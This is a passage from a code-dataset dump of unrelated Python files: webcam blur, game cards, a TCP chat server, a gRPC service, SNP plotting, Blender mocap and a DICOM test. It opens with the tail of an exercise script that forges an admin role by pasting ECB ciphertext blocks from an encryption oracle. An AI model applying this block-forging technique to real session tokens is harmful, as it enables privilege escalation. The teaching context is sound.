+ uid_len\n desired_email_len = (((total_len // 16) + 1) * 16) - total_len\n email = 'a' * desired_email_len\n cipher = user.oracle(email) \n \n print('Current user:', user.unoracle(cipher))\n\n # Cut out the 'user'.\n cipher = cipher[:-16]\n\n # To put in an admin, we must figure out how it is encrypted.\n # We do this by aligning it in the email as a padded block\n # and then select it from the ciphertext.\n desired_real_email_len = 16 - email_prefix_len\n real_email = 'a' * desired_real_email_len\n email = real_email + pad.pkcs7(b'admin', 16).decode('ascii')\n cipher_2 = user.oracle(email)\n\n # Now the second block should be the encrypted form of the\n # well-padded 'admin' text.\n admin_cipher = cipher_2[16:32]\n\n # Now paste that on to our old user account.\n cipher += admin_cipher\n\n print('Newly adminified:', user.unoracle(cipher))\n\n\nif __name__ == '__main__':\n _main()\n","sub_path":"2set/admin.py","file_name":"admin.py","file_ext":"py","file_size_in_byte":1442,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"65041572","text":"import cv2\nimport numpy as np\nimport matplotlib.pyplot as plt\n\n\ndef nothing_to_do(x) :\n\tpass\n\nif __name__ == '__main__' :\n\tcap = cv2.VideoCapture(0)\n\t\n\tcv2.namedWindow('frame')\n\tcv2.createTrackbar('K', 'frame', 1, 21, nothing_to_do)\n\n\twhile(True) :\n\t\tret, frame = cap.read()\n\t\t\n\t\tk = cv2.getTrackbarPos('K', 'frame')\n\t\tif k == 0:\n\t\t\tk = 1\n## Do blur\n\t\tkernel = np.ones((k, k), np.float32) / (k*k)\n\t\tframe = cv2.filter2D(frame, -1, kernel)\n\n# Image flipping\n\t\tframe = cv2.flip(frame, 1)\n\t\tcv2.imshow('frame', frame)\n\t\tif cv2.waitKey(1) & 0xFF == ord('q') :\n\t\t\tbreak\n\n\tcap.release()\n\tcv2.destroyAllWindows()\n","sub_path":"code/02-mac_cam.py","file_name":"02-mac_cam.py","file_ext":"py","file_size_in_byte":606,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"170021094","text":"\"\"\"This module contains all available rules.\"\"\"\n\nimport random\n\n\nclass Card:\n card_by_name = dict()\n\n @staticmethod\n def play(*args, **kwargs):\n raise NotImplementedError()\n\n\nclass ShuffleTurnOrder(Card):\n @staticmethod\n def play(*args, **kwargs):\n game = kwargs.get('game', None)\n if game:\n random.shuffle(game.participants)\n\n\nclass ReverseTurnOrder(Card):\n @staticmethod\n def play(*args, **kwargs):\n game = kwargs.get('game', None)\n if game:\n # turn_id = 3, len = 5\n # [1, 2, 3, 4, 5]\n # ^\n # 4 → Reverse Turn Order\n # [5, 4, 3, 2, 1]\n #\n # [2, 1, 5, 4, 3]\n # ^\n game.participants.reverse()\n split = len(game.participants) - (game.current_turn - 1) % len(game.participants)\n game.participants = game.participants[split:] + game.participants[:split]\n\n\nclass SkipNextTurn(Card):\n @staticmethod\n def play(*args, **kwargs):\n game = kwargs.get('game', None)\n if game:\n game.next_turn()\n","sub_path":"four_in_a_row_online/data/cards.py","file_name":"cards.py","file_ext":"py","file_size_in_byte":1127,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"448253931","text":"#!usr/bin/env python \n# -*- coding:utf-8 _*- \n\"\"\" \n@author:kevinlee \n@file: tcp_server.py \n@time: 2018/02/09 \n\"\"\"\nimport socket, time, threading\n\ninputs = []\n\n\ndef tcplink(sock, addr):\n print('Accept new connection from %s:%s...' % addr)\n sock.send(b'welcome')\n while True:\n data = sock.recv(1024)\n time.sleep(1)\n if data.decode('utf-8') == 'bye':\n sock.send(b'bye')\n inputs.remove(sock)\n break\n for other in inputs:\n other.send(b'%s say: %s' % (str(addr[0]).encode('utf-8'), str(data).encode('utf-8')))\n sock.close()\n print('Connection from %s:%s closed.' % addr)\n\n\ns = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\ns.bind(('0.0.0.0', 9999))\ns.listen(5)\nwhile True:\n sock, addr = s.accept()\n inputs.append(sock)\n t = threading.Thread(target=tcplink, args=(sock, addr))\n t.start()\n","sub_path":"tcp_server.py","file_name":"tcp_server.py","file_ext":"py","file_size_in_byte":886,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"85701946","text":"\nfrom grpcalchemy import DefaultConfig\nfrom models import Book\nimport sqlalchemy\nfrom sqlalchemy.orm import sessionmaker\nfrom grpcalchemy.orm import Message, StringField\nfrom grpcalchemy import Server, Context, grpcmethod\nfrom typing import List\nfrom models import Book , Record\n\nengine = sqlalchemy.create_engine(\n 'mysql://lab:osmentos@mysqldb:3306/library2', echo=True)\nSession = sessionmaker(bind=engine)\nsession = Session()\n\n\nclass BookDetailsFields(Message):\n book_name: str\n author_name: str\n description: str\n condition: str\n\n\nclass AvailablebookFields(Message):\n book_name: str\n author_name: str\n\n\nclass BookDetailsRequestmesg(Message):\n book_id: int\n\nclass AvailableRequestMesg(Message):\n\tNone\nclass BookRecordRequestMesg(Message):\n\tbook_id: int\n\nclass BookDetailsResponseMesg(Message):\n\tbooks: List[BookDetailsFields]\n\n\nclass AvailableResponseMesg(Message):\n availablebooks: List[AvailablebookFields]\n\nclass BookRecordResponseMesg(Message):\n\tcount: int\n\nclass GetBookdetails(Server):\n @grpcmethod\n def bookDetails(self, request: BookDetailsRequestmesg, context: Context) -> BookDetailsResponseMesg:\n book_1 = session.query(Book).filter_by(\n id=request.book_id).first()\n x = BookDetailsFields()\n x.book_name = book_1.book_name\n x.author_name = book_1.author_name\n x.description = book_1.description\n x.condition = book_1.condition\n return BookDetailsResponseMesg(books=[x])\n\n @grpcmethod\n def availableBooks(self, request: AvailableRequestMesg , context: Context) -> AvailableResponseMesg:\n available_book = session.query(Book).filter_by(\n is_available=True).all()\n arr = []\n for book in available_book:\n \tx = AvailablebookFields()\n \tx.book_name = book.book_name\n \tx.author_name = book.author_name\n \tarr.append(x)\n return AvailableResponseMesg(availablebooks=arr)\n\n @grpcmethod\n def bookRecord(self, request:BookRecordRequestMesg , context: Context) -> BookRecordResponseMesg:\n \tissuecount=session.query(Record).filter_by(\n id=request.book_id).count()\n \treturn BookRecordResponseMesg(count=issuecount)\n\n\nclass TestConfig(DefaultConfig):\n GRPC_SEVER_REFLECTION_ENABLE = True\n\n\nif __name__ == '__main__':\n GetBookdetails.run(host=\"library\", port=50059, config=TestConfig())\n","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":2377,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"608117202","text":"#!/usr/bin/env python\nimport matplotlib\nmatplotlib.use('Agg')\nimport pandas as pd\nimport numpy as np\nfrom matplotlib import pyplot as plt\nimport argparse\nimport os\n\nparser = argparse.ArgumentParser()\nparser.add_argument('-a','--conditionA',help='the snp profile in condition A')\nparser.add_argument('-b','--conditionB',help='the snp profile in condition B')\nparser.add_argument('-n','--conditionAName',help='name of condition A')\nparser.add_argument('-l','--conditionBLabel',help='name of condition B')\nparser.add_argument('-c','--chr',help='the chrosome number of the segment.Example,\\\nuse chr1 instand of 1')\nparser.add_argument('-s','--start',help='the start position of the segment')\nparser.add_argument('-e','--end',help='the end position of the segment')\nparser.add_argument('-t','--truth',help='the truth snp profile')\nparser.add_argument('-o','--outdir',default='.',help='the output directory')\nargs = parser.parse_args()\n\ndef LoadSNPObsertData(filename,chrname,start,end):\n df = pd.read_table(filename,header=None)\n df.columns = ['chr','location','maf','coverage']\n return df[(df.chr == chrname)&(df.location > start-1)&(df.location < end+1)]\n \ndef LoadTruthSNPData(filename,chrname,start,end):\n df = pd.read_table('snp.vcf',header=None)\n df.columns = ['chr','location','code']\n return df[(df.chr == chrname)&(df.location > start-1)&(df.location < end+1)]\n\ndef Difference(df1,df2,on):\n columnname = df1.columns\n columnsize = len(columnname)\n df = pd.merge(df1,df2,how='left',on=on)\n df = df[df[df.columns[columnsize]].isnull()]\n df = df.ix[:,:columnsize]\n df.columns = columnname\n df.index = range(len(df))\n return df\n \ndef PlotSNPCoverage(comm,diff1,diff2,outdir,xlabel=None,ylabel=None,title=None):\n fig,ax = plt.subplots(nrows=1,ncols=1)\n plt.plot(comm.coverage_x,comm.coverage_y,'o',alpha=0.7)\n comm_min = np.min([np.min(comm.coverage_x),np.min(comm.coverage_y)])\n comm_max = np.max([np.max(comm.coverage_x),np.max(comm.coverage_y)])\n diff1_min = diff2_min = comm_min\n diff1_max = diff2_max = comm_max\n if len(diff1) != 0:\n diff1_min = np.min(diff1.coverage)\n diff1_max = np.max(diff1.coverage)\n if len(diff2) != 0:\n diff2_min = np.min(diff2.coverage)\n diff2_max = np.max(diff2.coverage)\n minvalue = np.min([comm_min,diff1_min,diff2_min])\n maxvalue = np.max([comm_max,diff1_max,diff2_max])\n if len(diff1) != 0:\n plt.plot(diff1.coverage,[minvalue-1]*len(diff1),'o',color='r',alpha=0.5)\n if len(diff2) != 0:\n plt.plot([minvalue-1]*len(diff2),diff2.coverage,'o',color='r',alpha=0.5)\n plt.plot([minvalue-1.5,maxvalue+1],[minvalue-1.5,maxvalue+1])\n plt.xlim([minvalue-1.5,maxvalue+0.5])\n plt.ylim([minvalue-1.5,maxvalue+0.5])\n plt.xlabel(xlabel)\n plt.ylabel(ylabel)\n plt.title(title)\n plt.subplots_adjust(top=0.96,bottom=0.06,left=0.07,right=0.98)\n fig.set_size_inches([ 9.59, 9.52])\n curpath = os.path.abspath('.')\n os.chdir(outdir)\n plt.savefig('snp_coverage.png',format='png',dpi=300)\n os.chdir(curpath)\n\ndef PlotSNPMaf(comm,diff1,diff2,outdir,xlabel=None,ylabel=None,title=None):\n fig,ax = plt.subplots(nrows=1,ncols=1)\n plt.plot(comm.maf_x,comm.maf_y,'o',alpha=0.7)\n comm_min = np.min([np.min(comm.maf_x),np.min(comm.maf_y)])\n comm_max = np.max([np.max(comm.maf_x),np.max(comm.maf_y)])\n diff1_min = diff2_min = comm_min\n diff1_max = diff2_max = comm_max\n if len(diff1) != 0:\n diff1_min = np.min(diff1.maf)\n diff1_max = np.max(diff1.maf)\n if len(diff2) != 0:\n diff2_min = np.min(diff2.maf)\n diff2_max = np.max(diff2.maf)\n minvalue = np.min([comm_min,diff1_min,diff2_min])\n maxvalue = np.max([comm_max,diff1_max,diff2_max])\n if len(diff1) != 0:\n plt.plot(diff1.maf,[minvalue-0.03]*len(diff1),'o',color='r',alpha=0.5)\n if len(diff2) != 0:\n plt.plot([minvalue-0.03]*len(diff2),diff2.maf,'o',color='r',alpha=0.5)\n plt.plot([minvalue-0.1,maxvalue+0.1],[minvalue-0.1,maxvalue+0.1])\n plt.xlim([minvalue-0.05,maxvalue+0.01])\n plt.ylim([minvalue-0.05,maxvalue+0.01])\n plt.xlabel(xlabel)\n plt.ylabel(ylabel)\n plt.title(title)\n plt.subplots_adjust(top=0.96,bottom=0.06,left=0.07,right=0.98)\n fig.set_size_inches([ 9.59, 9.52])\n curpath = os.path.abspath('.')\n os.chdir(outdir)\n plt.savefig('snp_maf.png',format='png',dpi=300)\n os.chdir(curpath)\n\ndef PlotRatioOfSNPCoverage(comm,outdir,ylabel=None,title=None):\n fig,ax = plt.subplots(nrows=1,ncols=1)\n plt.plot(range(len(comm)),[col['coverage_x']*1.0/col['coverage_y'] for ix,col\n in comm.iterrows()],'o',alpha=0.7)\n plt.hlines(y=1.0,xmin=-1,xmax=len(comm)+1)\n plt.xlim([-1,len(comm)+1])\n plt.xlabel('snp index')\n plt.ylabel(ylabel)\n plt.title(title)\n plt.subplots_adjust(top=0.96,bottom=0.06,left=0.07,right=0.98)\n fig.set_size_inches([ 9.59, 9.52])\n curpath = os.path.abspath('.')\n os.chdir(outdir)\n plt.savefig('snp_coverage_ratio.png',format='png',dpi=300)\n os.chdir(curpath)\n\ndef PlotRatioOfSNPMaf(comm,outdir,ylabel=None,title=None):\n fig,ax = plt.subplots(nrows=1,ncols=1)\n plt.plot(range(len(comm)),[col['maf_x']*1.0/col['maf_y'] for ix,col\n in comm.iterrows()],'o',alpha=0.7)\n plt.hlines(y=1.0,xmin=-1,xmax=len(comm)+1)\n plt.xlim([-1,len(comm)+1])\n plt.xlabel('snp index')\n plt.ylabel(ylabel)\n plt.title(title)\n plt.subplots_adjust(top=0.96,bottom=0.06,left=0.07,right=0.98)\n fig.set_size_inches([ 9.59, 9.52])\n curpath = os.path.abspath('.')\n os.chdir(outdir)\n plt.savefig('snp_maf_ratio.png',format='png',dpi=300)\n os.chdir(curpath)\n\ndef PlotSNPCoverageDistribution(df1,df2,outdir,title=None):\n fig,ax = plt.subplots(nrows=1,ncols=1)\n plt.hist(df1.coverage,bins=15,alpha=0.7)\n plt.hist(df2.coverage,bins=15,alpha=0.7)\n plt.subplots_adjust(top=0.96,bottom=0.06,left=0.06,right=0.98)\n fig.set_size_inches([ 9.59, 9.52])\n plt.xlabel('snp coverage')\n plt.ylabel('snp count')\n plt.title(title)\n curpath = os.path.abspath('.')\n os.chdir(outdir)\n plt.savefig('snp_coverage_distribution.png',format='png',dpi=300)\n os.chdir(curpath)\n\ndef PlotSNPMafDistribution(df1,df2,outdir,title=None):\n fig,ax = plt.subplots(nrows=1,ncols=1)\n plt.hist(df1.maf,bins=15,alpha=0.7)\n plt.hist(df2.maf,bins=15,alpha=0.7)\n plt.subplots_adjust(top=0.96,bottom=0.06,left=0.06,right=0.98)\n fig.set_size_inches([ 9.59, 9.52])\n plt.xlabel('snp maf')\n plt.ylabel('snp count')\n plt.title(title)\n curpath = os.path.abspath('.')\n os.chdir(outdir)\n plt.savefig('snp_maf_distribution.png',format='png',dpi=300)\n os.chdir(curpath)\n\ndef PlotSNPCoverageTFDistribution(rdf,wdf,outdir,outfilename,title=None):\n fig,ax = plt.subplots(nrows=1,ncols=1)\n plt.hist(rdf.coverage,bins=6,alpha=0.7)\n plt.hist(wdf.coverage,bins=6,alpha=0.7)\n plt.xlabel('snp coverage')\n plt.ylabel('snp count')\n plt.title(title)\n plt.subplots_adjust(top=0.96,bottom=0.06,left=0.06,right=0.98)\n fig.set_size_inches([ 9.59, 9.52])\n curpath = os.path.abspath('.')\n os.chdir(outdir)\n plt.savefig(outfilename,format='png',dpi=300)\n os.chdir(curpath)\n\ndef PlotSNPMafTFDistribution(rdf,wdf,outdir,outfilename,title=None):\n fig,ax = plt.subplots(nrows=1,ncols=1)\n plt.hist(rdf.maf,bins=6,alpha=0.7)\n plt.hist(wdf.maf,bins=6,alpha=0.7)\n plt.xlabel('snp maf')\n plt.ylabel('snp count')\n plt.title(title)\n plt.subplots_adjust(top=0.96,bottom=0.06,left=0.06,right=0.98)\n fig.set_size_inches([ 9.59, 9.52])\n curpath = os.path.abspath('.')\n os.chdir(outdir)\n plt.savefig(outfilename,format='png',dpi=300)\n os.chdir(curpath)\n\nif __name__ == '__main__':\n chrname = args.chr\n start = int(args.start)\n end = int(args.end)\n df1 = LoadSNPObsertData(args.conditionA,chrname,start,end)\n df2 = LoadSNPObsertData(args.conditionB,chrname,start,end)\n truth = LoadTruthSNPData(args.truth,chrname,start,end)\n path = args.outdir.strip()\n isExists = os.path.exists(path)\n if not isExists:\n os.makedirs(path)\n\n comm = pd.merge(df1,df2,on=['chr','location'])\n diff1 = Difference(df1,df2,on=['chr','location'])\n diff2 = Difference(df2,df1,on=['chr','location'])\n xlabel = args.conditionAName + ' snp coverage'\n ylabel = args.conditionBLabel + ' snp coverage'\n title = \"%s:%d-%d snp coverage\" % (chrname,start,end)\n PlotSNPCoverage(comm,diff1,diff2,path,xlabel,ylabel,title)\n \n xlabel = args.conditionAName + ' snp maf'\n ylabel = args.conditionBLabel + ' snp maf'\n PlotSNPMaf(comm,diff1,diff2,path,xlabel,ylabel,title)\n\n ylabel = '(snp coverage in %s)/(snp coverage in %s)' % (args.conditionAName,\n args.conditionBLabel)\n title = \"%s:%d-%d ratio of snp coverage\" % (chrname,start,end)\n PlotRatioOfSNPCoverage(comm,path,ylabel,title)\n\n ylabel = '(snp maf in %s)/(snp maf in %s)' % (args.conditionAName,\n args.conditionBLabel)\n title = \"%s:%d-%d ratio of snp maf\" % (chrname,start,end)\n PlotRatioOfSNPMaf(comm,path,ylabel,title)\n\n title = \"%s:%d-%d snp coverage distribution\" % (chrname,start,end)\n PlotSNPCoverageDistribution(df1,df2,path,title)\n \n title = \"%s:%d-%d snp maf distribution\" % (chrname,start,end)\n PlotSNPMafDistribution(df1,df2,path,title)\n\n rdf = pd.merge(df1,truth,on=['chr','location'])\n wdf = Difference(df1,truth,on=['chr','location'])\n outfilename = '%s_snp_TF_maf_distribution.png' % args.conditionAName\n title = '%s:%d-%d %s snp maf distribution' % (chrname,start,end,args.conditionAName)\n PlotSNPMafTFDistribution(rdf,wdf,path,outfilename,title)\n \n outfilename = '%s_snp_TF_coverage_distribution.png' % args.conditionAName\n title = '%s:%d-%d %s snp coverage distribution' % (chrname,start,end,args.conditionAName)\n PlotSNPCoverageTFDistribution(rdf,wdf,path,outfilename,title)\n\n rdf = pd.merge(df2,truth,on=['chr','location'])\n wdf = Difference(df2,truth,on=['chr','location'])\n outfilename = '%s_snp_TF_maf_distribution.png' % args.conditionBLabel\n title = '%s:%d-%d %s snp maf distribution' % (chrname,start,end,args.conditionBLabel)\n PlotSNPMafTFDistribution(rdf,wdf,path,outfilename,title)\n \n outfilename = '%s_snp_TF_coverage_distribution.png' % args.conditionBLabel\n title = '%s:%d-%d %s snp coverage distribution' % (chrname,start,end,args.conditionBLabel)\n PlotSNPCoverageTFDistribution(rdf,wdf,path,outfilename,title)","sub_path":"pltsegmaf.py","file_name":"pltsegmaf.py","file_ext":"py","file_size_in_byte":10494,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"300789034","text":"import bpy\n\nfrom . import data_structures\nfrom . import utils\nfrom . import runtime\nfrom . import messages\nfrom . import sensors\nfrom . import matrix_generator\nfrom . import filter\n\nfrom math import isinf\nfrom math import radians\nfrom mathutils import *\n\nmillisecondsPerSecond = 1000\n\naccelerometerRecord = sensors.AccelerationSensor() # Result needs to be integrated twice\nmagneticFieldSensorRecord = sensors.PositionSensor() # Result doesn't need to be integrated\ngyroscopeRecord = sensors.SpeedSensor() # Result needs to be integrated once\n\n#\n#\tResets all the data for a fresh capture session\n#\ndef resetData():\n\truntime.firstTS = {}\n\truntime.currentOrientation = {}\n\truntime.currentPosition = {}\n\truntime.transformationMatrix = {}\n\n#\n#\tReturns the bone object by the given rig and bone name\n#\n#\t@param string selectedRig\n#\t@param string selectedBone\ndef getBoneByData( selectedRig, selectedBone ):\n\tobj = bpy.data.objects[selectedRig]\n\treturn obj.pose.bones[selectedBone]\n\t\n#\n#\tReturns the difference in the orientation\n#\tbetween the current and the new orientation\n#\tbased on the values that were given by the\n#\tgyroscope.\n#\n#\t@param string selectedRig\n#\t@param string selectedBone\ndef getDeltaOrientation( selectedRig, selectedBone ):\n\tnewOrientation = gyroscopeRecord.get( selectedRig, selectedBone )\n\tnewOrientation = Vector( (-newOrientation[0], -newOrientation[1], -newOrientation[2]) )\n\t\t\t\n\tfilteredOrientation = filter.applyOrientationFilter( selectedRig, selectedBone, newOrientation )\n\t\t\t\n\tif selectedRig not in runtime.currentOrientation:\n\t\truntime.currentOrientation[selectedRig] = {}\n\t\t\n\t\tif selectedBone not in runtime.currentOrientation[selectedRig]:\n\t\t\truntime.currentOrientation[selectedRig][selectedBone] = filteredOrientation\n\t\t\t\n\toutput = runtime.currentOrientation[selectedRig][selectedBone]-filteredOrientation\n\t\n\tsetNewOrientation( selectedRig, selectedBone, filteredOrientation )\n\t\n\treturn output\n\n#\n#\tTODO\n#\n#\t@param string selectedRig\n#\t@param string selectedBone\n#\t@param tuple recordedTranslation\ndef applyCoordinateTransformation( selectedRig, selectedBone, recordedTranslation ):\t\n\tmatrix = getTransformationMatrix( selectedRig, selectedBone )\n\t\n\tmagnetData = magneticFieldSensorRecord.get( selectedRig, selectedBone )\n\tfilteredTranslation = filter.applyAccelerometerFilter( selectedRig, selectedBone, recordedTranslation, magnetData )\n\t\n\trecordedTranslationVector = Vector( (filteredTranslation[0], filteredTranslation[1], filteredTranslation[2], 1.0) )\n\t\n\treturn matrix * recordedTranslationVector\n\t\n#\n#\tReturns the difference between the cumulated position and the new calculated\n#\n#\t@param string selectedRig\n#\t@param string selectedBone\ndef getDeltaTranslation( selectedRig, selectedBone ):\n\trecordedTranslation = accelerometerRecord.get( selectedRig, selectedBone )\n\tnewPosition = applyCoordinateTransformation( selectedRig, selectedBone, recordedTranslation )\n\t\n\tif selectedRig not in runtime.currentPosition:\n\t\truntime.currentPosition[selectedRig] = {}\n\t\t\n\t\tif selectedBone not in runtime.currentPosition[selectedRig]:\n\t\t\truntime.currentPosition[selectedRig][selectedBone] = newPosition\n\t\t\t\n\toutput = runtime.currentPosition[selectedRig][selectedBone]-newPosition\n\t\n\tsetNewPosition( selectedRig, selectedBone, newPosition )\n\t\n\treturn output\n\n#\n#\tOverride position for bone identified by given data\n#\n#\t@param string selectedRig\n#\t@param string selectedBone\n#\t@param vector3 newOrientation\ndef setNewPosition( selectedRig, selectedBone, newPosition ):\n\truntime.currentPosition[selectedRig][selectedBone] = newPosition\n\t\n#\n#\tOverride orientation for bone identified by given data\n#\n#\t@param string selectedRig\n#\t@param string selectedBone\n#\t@param vector3 newOrientation\ndef setNewOrientation( selectedRig, selectedBone, newOrientation ):\n\truntime.currentOrientation[selectedRig][selectedBone] = newOrientation\n\n#\n#\tTODO\n#\n#\t@param string selectedRig\n#\t@param string selectedBone\ndef setTransformationMatrix( selectedRig, selectedBone, transmittedData ):\n\tif selectedRig not in runtime.transformationMatrix:\n\t\truntime.transformationMatrix[selectedRig] = {}\n\t\t\n\truntime.transformationMatrix[selectedRig][selectedBone] = createTransformationMatrixFromData( transmittedData )\n\n#\n#\tTODO\n#\n#\t@param dictionary transmittedData\ndef createTransformationMatrixFromData( transmittedData ):\n\treturn matrix_generator.createTransformationMatrixFromData( transmittedData )\n\t\n#\n#\tReturns the coordinate transformation matrix for the selected bone\n#\n#\t@param string selectedRig\n#\t@param string selectedBone\ndef getTransformationMatrix( selectedRig, selectedBone ):\n\treturn runtime.transformationMatrix[selectedRig][selectedBone]\n\n#\n#\tProcess given data object,\n#\tthat was passed through the socket.\n#\tNo verification done yet\n#\n#\t@param dictionary data\ndef processData( data ):\n\tif runtime.debug:\n\t\tutils.logData( data )\n\t\n\tif 'selectedRig' not in data or 'selectedBone' not in data:\n\t\treturn\n\t\t\n\tif 'values' not in data or 'transformationMatrix' not in data['values']:\n\t\treturn\n\t\n\tselectedRig = data['selectedRig']\n\tselectedBone = data['selectedBone']\n\t\n\tsetTransformationMatrix( selectedRig, selectedBone, data['values']['transformationMatrix'] )\t\n\tinsertSensorData( selectedRig, selectedBone, data )\n\t\n\tapplyTransformations( selectedRig, selectedBone )\n\t\n#\n#\tApplies a rotation and translation to the bone,\n#\tthat is identified by given rig and bone.\n#\tRotation and translation will be calculated by using \n#\tthe sensor data that were currently at the end of the\n#\tqueue of the according sensor objects\n#\n#\t@param string selectedRig\n#\t@param string selectedBone\ndef applyTransformations( selectedRig, selectedBone ):\n\tbone = getBoneByData( selectedRig, selectedBone )\n\t\n\tdeltaOrientation = getDeltaOrientation( selectedRig, selectedBone )\n\tdeltaTranslation = getDeltaTranslation( selectedRig, selectedBone )\n\t\n\trotationMatrix = matrix_generator.getRotationMatrix( deltaOrientation )\n\ttranslationMatrix = matrix_generator.getTranslationMatrix( deltaTranslation )\n\t\n\tbone.matrix *= (rotationMatrix * translationMatrix)\n\n#\n#\tProcesses the given sensor data and distributes\n#\tit to the different sensor objects\n#\n#\t@param string selectedRig\n#\t@param string selectedBone\n#\t@param dictionary data\ndef insertSensorData( selectedRig, selectedBone, data ):\n\ttime = getTimeDiffForBone( selectedRig, selectedBone, data ) / millisecondsPerSecond\n\t\n\tif 'values' in data:\n\t\tvalues = data['values']\n\t\n\tinsertAccelerometerData( selectedRig, selectedBone, values, time )\n\tinsertGyroscopeData( selectedRig, selectedBone, values, time )\n\tinsertMagneticFieldData( selectedRig, selectedBone, values, time )\n\t\n#\n#\tHandles the given accelerometer data and adds it to the proper sensor object\n#\n#\t@param string selectedRig\n#\t@param string selectedBone\n#\t@param dictionary values\n#\t@param integer time\ndef insertAccelerometerData( selectedRig, selectedBone, values, time ):\n\taccelerometerValues = []\n\t\n\tif 'accelerometer' in values:\n\t\tset = values['accelerometer']\n\t\tif 'x' in set and 'y' in set and 'z' in set:\n\t\t\taccelerometerValues.append( set['x'] )\n\t\t\taccelerometerValues.append( set['y'] )\n\t\t\taccelerometerValues.append( set['z'] )\n\n\tif len(accelerometerValues) == 3:\n\t\taccelerometerValues = filter.subtractGravity( accelerometerValues )\n\t\taccelerometerRecord.insert(selectedRig, selectedBone, time, accelerometerValues)\n\n#\n#\tHandles the given gyroscope data and adds it to the proper sensor object\n#\n#\t@param string selectedRig\n#\t@param string selectedBone\n#\t@param dictionary values\n#\t@param integer time\ndef insertGyroscopeData( selectedRig, selectedBone, values, time ):\n\tgyroscopeValues = []\n\t\n\tif 'gyroscope' in values:\n\t\tset = values['gyroscope']\n\t\tif 'x' in set and 'y' in set and 'z' in set:\n\t\t\tgyroscopeValues.append( set['x'] )\n\t\t\tgyroscopeValues.append( set['y'] )\n\t\t\tgyroscopeValues.append( set['z'] )\n\t\t\t\t\n\tif len(gyroscopeValues) == 3:\n\t\tgyroscopeRecord.insert(selectedRig, selectedBone, time, gyroscopeValues)\n\n#\n#\tHandles the given magnetic field data and adds it to the proper sensor object\n#\n#\t@param string selectedRig\n#\t@param string selectedBone\n#\t@param dictionary values\ndef insertMagneticFieldData( selectedRig, selectedBone, values, time):\n\tmagneticFieldValues = []\n\t\n\tif 'magnetic' in values:\n\t\tset = values['magnetic']\n\t\tif 'x' in set and 'y' in set and 'z' in set:\n\t\t\tmagneticFieldValues.append( set['x'] )\n\t\t\tmagneticFieldValues.append( set['y'] )\n\t\t\tmagneticFieldValues.append( set['z'] )\n\t\t\t\t\n\tif len(magneticFieldValues) == 3:\n\t\tmagneticFieldSensorRecord.insert(selectedRig, selectedBone, time, magneticFieldValues)\t\n\n#\n#\tReturns the time difference between the\n#\tcurrent data package and the last (in milliseconds)\n#\n#\t@param string selectedRig\n#\t@param string selectedBone\n#\t@param dictionary data\ndef getTimeDiffForBone( selectedRig, selectedBone, data ):\n\tif 'timestamp' not in data:\n\t\treturn 0\n\t\n\ttime = data['timestamp']\n\t\n\tif selectedRig not in runtime.firstTS:\n\t\truntime.firstTS[selectedRig] = {}\n\t\t\n\t\tif selectedBone not in runtime.firstTS[selectedRig]:\n\t\t\truntime.firstTS[selectedRig][selectedBone] = time\n\t\t\n\treturn (time - runtime.firstTS[selectedRig][selectedBone])","sub_path":"mocap.py","file_name":"mocap.py","file_ext":"py","file_size_in_byte":9119,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"353461871","text":"height = int(input())\nwidth = int(input())\nimg = []\nfor i in range(height):\n string = input()\n temp = [item for item in string]\n img.append(temp)\nfor cols, cells in enumerate(img):\n if cols > 0:\n img.remove(cells)\n\nfor cells in img:\n for ix, rows in enumerate(cells):\n del cells[ix]\n\nfor item in img:\n print(*item)","sub_path":"lab2/12.7.py","file_name":"12.7.py","file_ext":"py","file_size_in_byte":346,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"648790240","text":"import json\nimport logging\nimport os\nimport shutil\nimport subprocess\nimport sys\nimport tempfile\n\nimport odil\n\nimport dicomdiff\nimport jsondiff\n\ndef main():\n root = os.path.abspath(os.path.join(os.path.dirname(__file__), \"..\"))\n input_ = os.path.join(root, \"input\")\n baseline = os.path.join(root, \"baseline\")\n \n tests = [\n [\n [],\n os.path.join(input_, \"20160718_115906_plateforme_fantome_nouille_other_1_7\"),\n os.path.join(baseline, \"20160718_115906_plateforme_fantome_nouille_other_1_7.dcm\")\n ],\n [\n [\"-m\"],\n os.path.join(input_, \"20160718_115906_plateforme_fantome_nouille_other_1_7\"),\n os.path.join(baseline, \"20160718_115906_plateforme_fantome_nouille_other_1_7.dcm.multi\")\n ],\n [\n [],\n os.path.join(input_, \"lb_140721.Bq1\"),\n os.path.join(baseline, \"lb_140721.Bq1.dcm\")\n ],\n [\n [],\n os.path.join(input_, \"lb_140721.Bx1\"),\n os.path.join(baseline, \"lb_140721.Bx1.dcm\")\n ]\n ]\n \n for arguments, case_input, case_baseline in tests:\n case_output = tempfile.mkdtemp()\n try:\n try:\n subprocess.check_call(\n [\"bruker2dicom\", \"convert\", \"--dicomdir\"]\n +arguments\n +[case_input, case_output])\n except subprocess.CalledProcessError as e:\n print(e.output)\n return\n \n diff(case_baseline, case_output)\n finally:\n shutil.rmtree(case_output)\n\ndef diff(baseline, test):\n # Walk the baseline to find missing missing in test and different from test\n for pathname, dirnames, filenames in os.walk(baseline):\n relative_pathname = pathname[len(os.path.join(baseline, \"\")):]\n test_pathname = os.path.join(test, relative_pathname)\n for filename in filenames:\n if filename == \"DICOMDIR\":\n logging.warning(\"Not testing DICOMDIR\")\n continue\n \n baseline_filename = os.path.join(pathname, filename)\n test_filename = os.path.join(test_pathname, filename)\n if not os.path.isfile(os.path.join(test_pathname, filename)):\n print(\"{} missing in test\".format(\n os.path.join(relative_pathname, filename)))\n else:\n result = dicomdiff.diff(\n baseline_filename, test_filename, True,[\n str(getattr(odil.registry, x)) for x in [\n \"MediaStorageSOPInstanceUID\", \"SOPInstanceUID\", \n \"InstanceCreationDate\", \"InstanceCreationTime\", \n \"SpecificCharacterSet\", \"ContentDate\",\n 